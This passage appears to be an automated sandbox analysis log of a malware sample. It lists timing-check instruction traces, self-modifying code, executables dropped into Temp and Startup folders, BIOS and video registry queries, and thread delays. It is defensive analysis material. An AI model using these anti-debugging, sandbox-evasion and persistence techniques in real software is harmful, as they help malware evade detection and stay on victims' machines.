                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0079 second address: 4FD009F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, D678h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dh, 51h 0x00000012 call 00007FC408FC7022h 0x00000017 pop ecx 0x00000018 popad 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD009F second address: 4FD00D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 adc si, 4008h 0x0000000e jmp 00007FC408FC8B0Bh 0x00000013 popfd 0x00000014 movzx eax, dx 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ecx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov dx, 3E02h 0x00000024 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD00D2 second address: 4FD010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 call 00007FC408FC7025h 0x0000000a pop eax 0x0000000b pop edi 0x0000000c popad 0x0000000d xchg eax, ebx 0x0000000e jmp 00007FC408FC701Ch 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FC408FC701Dh 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD010E second address: 4FD0123 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0123 second address: 4FD0182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC7027h 0x00000008 pop eax 0x00000009 mov edx, 31E76F9Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 push ebx 0x00000014 mov al, 0Ah 0x00000016 pop edi 0x00000017 popad 0x00000018 mov ebx, dword ptr [ebp+10h] 0x0000001b jmp 00007FC408FC7020h 0x00000020 xchg eax, esi 0x00000021 jmp 00007FC408FC7020h 0x00000026 push eax 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FC408FC701Eh 0x0000002e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0182 second address: 4FD01A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC408FC8B10h 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01A6 second address: 4FD01AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01AC second address: 4FD01B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01B2 second address: 4FD01B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01B6 second address: 4FD01BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD01BA second address: 4FD021F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c movzx esi, bx 0x0000000f pushfd 0x00000010 jmp 00007FC408FC7027h 0x00000015 xor ax, 169Eh 0x0000001a jmp 00007FC408FC7029h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 pushad 0x00000023 mov eax, 7C3E2603h 0x00000028 mov di, cx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FC408FC7020h 0x00000034 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD021F second address: 4FD0254 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 5874h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, edi 0x0000000d pushad 0x0000000e pushad 0x0000000f mov ax, bx 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 jmp 00007FC408FC8B0Dh 0x0000001b popad 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC408FC8B0Dh 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0254 second address: 4FD02ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7021h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC47AF253C2h 0x0000000f jmp 00007FC408FC701Eh 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b jmp 00007FC408FC7020h 0x00000020 je 00007FC47AF253ADh 0x00000026 pushad 0x00000027 push ecx 0x00000028 pushfd 0x00000029 jmp 00007FC408FC701Dh 0x0000002e xor ecx, 3D477256h 0x00000034 jmp 00007FC408FC7021h 0x00000039 popfd 0x0000003a pop esi 0x0000003b popad 0x0000003c mov edx, dword ptr [esi+44h] 0x0000003f jmp 00007FC408FC701Ah 0x00000044 or edx, dword ptr [ebp+0Ch] 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC408FC7027h 0x0000004e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD02ED second address: 4FD0305 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0305 second address: 4FD0398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edx, 61000000h 0x00000011 jmp 00007FC408FC7026h 0x00000016 jne 00007FC47AF2536Ch 0x0000001c jmp 00007FC408FC7020h 0x00000021 test byte ptr [esi+48h], 00000001h 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FC408FC701Eh 0x0000002c and cx, DAC8h 0x00000031 jmp 00007FC408FC701Bh 0x00000036 popfd 0x00000037 push eax 0x00000038 push edx 0x00000039 pushfd 0x0000003a jmp 00007FC408FC7026h 0x0000003f and eax, 6A395D28h 0x00000045 jmp 00007FC408FC701Bh 0x0000004a popfd 0x0000004b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0398 second address: 4FD03E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 jne 00007FC47AF26E08h 0x0000000d pushad 0x0000000e call 00007FC408FC8B10h 0x00000013 call 00007FC408FC8B12h 0x00000018 pop esi 0x00000019 pop edx 0x0000001a mov bx, ax 0x0000001d popad 0x0000001e test bl, 00000007h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC408FC8B14h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD03E9 second address: 4FD03EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC08FE second address: 4FC0943 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC408FC8B17h 0x00000009 and eax, 6DA98A3Eh 0x0000000f jmp 00007FC408FC8B19h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0943 second address: 4FC0947 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0947 second address: 4FC094D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC094D second address: 4FC0953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0953 second address: 4FC0957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0957 second address: 4FC096F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC408FC701Bh 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC096F second address: 4FC09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FC408FC8B0Eh 0x00000010 and esp, FFFFFFF8h 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FC408FC8B0Eh 0x0000001a adc cl, 00000028h 0x0000001d jmp 00007FC408FC8B0Bh 0x00000022 popfd 0x00000023 pushad 0x00000024 jmp 00007FC408FC8B16h 0x00000029 popad 0x0000002a popad 0x0000002b push esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FC408FC8B16h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC09F2 second address: 4FC09F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC09F8 second address: 4FC0A09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B0Dh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A09 second address: 4FC0A0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A0D second address: 4FC0A32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebx 0x0000000b jmp 00007FC408FC8B0Dh 0x00000010 xchg eax, esi 0x00000011 pushad 0x00000012 mov eax, 1E5A1663h 0x00000017 push eax 0x00000018 push edx 0x00000019 mov si, 87D5h 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A32 second address: 4FC0A4B instructions: 0x00000000 rdtsc 0x00000002 mov ch, CCh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 movzx eax, di 0x0000000c mov edi, 6454239Ah 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A4B second address: 4FC0A4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A4F second address: 4FC0A69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC7026h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A69 second address: 4FC0A7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B0Eh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A7B second address: 4FC0A8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A8C second address: 4FC0A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A90 second address: 4FC0A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A94 second address: 4FC0A9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0A9A second address: 4FC0AB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AB1 second address: 4FC0AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AB5 second address: 4FC0ABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0ABB second address: 4FC0AC0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AC0 second address: 4FC0AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test esi, esi 0x0000000c jmp 00007FC408FC7021h 0x00000011 je 00007FC47AF2C8C7h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edi 0x0000001b pop eax 0x0000001c mov esi, ebx 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0AEB second address: 4FC0B1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B10h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC408FC8B17h 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B1F second address: 4FC0B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC7024h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B37 second address: 4FC0B82 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ecx, esi 0x0000000d jmp 00007FC408FC8B16h 0x00000012 je 00007FC47AF2E349h 0x00000018 jmp 00007FC408FC8B10h 0x0000001d test byte ptr [76FB6968h], 00000002h 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0B82 second address: 4FC0B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FC0CF5 second address: 4FC0D04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC8B0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0DBF second address: 4FD0E0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC701Fh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FC408FC7029h 0x0000000f xor cl, 00000066h 0x00000012 jmp 00007FC408FC7021h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f movsx ebx, cx 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B04 second address: 4FD0B90 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC408FC8B12h 0x00000008 jmp 00007FC408FC8B15h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushfd 0x00000011 jmp 00007FC408FC8B10h 0x00000016 and ecx, 3BAF9718h 0x0000001c jmp 00007FC408FC8B0Bh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FC408FC8B0Fh 0x0000002b adc cl, FFFFFFDEh 0x0000002e jmp 00007FC408FC8B19h 0x00000033 popfd 0x00000034 mov ax, 96A7h 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pushad 0x0000003f popad 0x00000040 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FD0B90 second address: 4FD0B9F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC408FC701Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505C9 second address: 50505CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505CD second address: 50505D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50505D3 second address: 5050678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, EA67h 0x00000007 pushfd 0x00000008 jmp 00007FC408FC8B0Ch 0x0000000d sub eax, 2AA1E898h 0x00000013 jmp 00007FC408FC8B0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d jmp 00007FC408FC8B16h 0x00000022 push eax 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FC408FC8B11h 0x0000002a sbb al, FFFFFFE6h 0x0000002d jmp 00007FC408FC8B11h 0x00000032 popfd 0x00000033 pushfd 0x00000034 jmp 00007FC408FC8B10h 0x00000039 xor esi, 57335C88h 0x0000003f jmp 00007FC408FC8B0Bh 0x00000044 popfd 0x00000045 popad 0x00000046 xchg eax, ebp 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC408FC8B15h 0x0000004e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050678 second address: 50506AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FC408FC7027h 0x00000008 pop esi 0x00000009 mov edi, 08075B5Ch 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FC408FC701Eh 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040D97 second address: 5040DAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC408FC8B14h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BD6 second address: 5040BDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5040BDC second address: 5040BE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EBEDFA instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: EBC16A instructions caused by: Self-modifying code
                          Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 10E3D69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46EDFA instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 46C16A instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 693D69 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: CCAB3E instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: CC81E6 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: E7C5E3 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: EFE96C instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: 5D5308F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: 5BAB272 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: 5D7DA8F instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Special instruction interceptor: First address: 5DEC419 instructions caused by: Self-modifying code
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Memory allocated: 9B0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Memory allocated: 23D0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Memory allocated: 2200000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Memory allocated: AD0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Memory allocated: 1B100000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Memory allocated: EC0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033975001\NzL6O1Q.exe Memory allocated: 1AAA0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Memory allocated: BF0000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ele.exe Memory allocated: 1AF30000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 1530000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 1B050000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 1190000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 1AB70000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 2870000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Roaming\NzL6O1Q.exe Memory allocated: 1AB50000 memory reserve | memory write watch
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                          Source: C:\Users\user\AppData\Local\Temp\1033924001\e44fda3216.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                          Source: C:\Users\user\Desktop\file.exe Code function: 0_2_05050000 rdtsc 0_2_05050000
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 600000
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599890
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599781
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599672
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599562
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599453
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599343
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599234
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 599125
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598992
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598797
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598625
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598515
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598406
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598290
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598161
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 598011
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597906
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597791
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597673
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597531
                          Source: C:\Users\user\AppData\Local\Temp\1033790001\9LbUK15.exe Thread delayed: delay time: 597422
